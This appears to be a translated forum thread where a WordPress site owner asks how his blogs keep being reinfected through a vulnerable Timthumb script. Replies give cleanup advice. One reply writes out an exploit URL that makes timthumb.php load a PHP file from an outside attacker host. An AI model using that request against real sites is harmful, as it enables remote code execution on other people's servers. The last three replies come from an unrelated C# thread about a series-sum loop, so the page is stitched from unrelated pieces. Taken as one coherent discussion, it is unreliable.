Wordpress and Timthumb vulnerability?

M

mihavxc2013-02-01 14:15:35

WordPress

mihavxc, 2013-02-01 14:15:35

Good afternoon, help clean up the shell with Wordpress.
I have my own server with a dozen sites and two useless blogs on Wodrpress (3.5.1). In fact, no one except search engines visits them. Both blogs had themes from Woothemes.com and five plugins installed. Everything except the topics I tried to update regularly. Once I noticed that through the cache.php script, these blogs post pages with links to other sites.
Googling, I realized that the problem was in the vulnerability of the Timthumb script, which was used in the themes. I updated the theme frameworks, disabled the use of this script in the theme settings and deleted the scripts themselves in all directories. I installed the Timthumb Scanner plugin, which searches for Timthumb scripts, updates them and reports if they are already hacked.
As a result, now I see the following picture - after deleting the scripts, after a couple of hours, the cache.php script appears again in /wp-content/uploads/2012/12, and the version is 2.8.10 (the last one is 2.8.11). If I update the script, then after a couple of hours the version will be 2.8.10 again. If you do not update, then after a while the plugin will say that the script has been hacked.
Tried disabling all plugins completely - same result. I looked at the logs - no strange requests. If you rename the index.php file at the root, then they stop breaking. I added a logger of all POST requests to index.php - nothing strange. I don’t understand how exactly they break me, it’s all obvious that this happens on the machine. Nothing suspicious in the ssh/ftp logs either. Maybe someone has already experienced something similar?

Reply

Answer the question

In order to leave comments, you need to log in

8 answer(s)

T

TyzhSysAdmin, 2013-02-01
@POS_troi

Look for shell.
Compare all engine files with the originals.
No one does this by hand, everything is automatic. If the index is 404, then “hacking is not performed” - about the renamed index.php

T

TyzhSysAdmin, 2013-02-01
@POS_troi

Also, it’s not a fact that hacking is done directly through the wordpress engine, here you can sin on your neighbors. Although it all depends on the server settings.

S

stan_jeremy, 2013-02-01
@stan_jeremy

did not understand why you implemented a post request logger? the bug is in the geth
/wp-content/themes/pbv_multi/scripts/timthumb.php?src=http://picasa.com.xpl.be/yahoo.php

B

Bo0oM, 2013-02-04
@Bo0oM

Ai hurt?
revision.com/ai/

S

Sergey Mozhaykin, 2014-07-07
@pwN11

double si = 1.0 / 6; // initial value for i = 1
double s = 0;
int i = 2;
double eps = double.Parse(Console.ReadLine());
while (Math.Abs(si) >= eps)
{
    s += si;
    si = -1 * si * (i - 1) / (i + 2);
    i++;
}
Console.WriteLine(s);
Console.ReadLine();

S

Sumor, 2014-07-06
@Sumor

A while loop suits you better than a for loop.
By the terms of the problem, you only need to compare the i-th term BEFORE it is added to s, and you are comparing e with s.
An incomprehensible game with the parameter a confuses the reader, and also does not allow the sum to be calculated with an accuracy of more than 100 terms.

A

Alexey Kulakov, 2014-07-07
@carbon88

Assume that the required accuracy is achieved if the sum of the first few terms is calculated and the next term turned out to be less than e in absolute value

It looks like you forgot about the modulus of s when comparing with epsilon.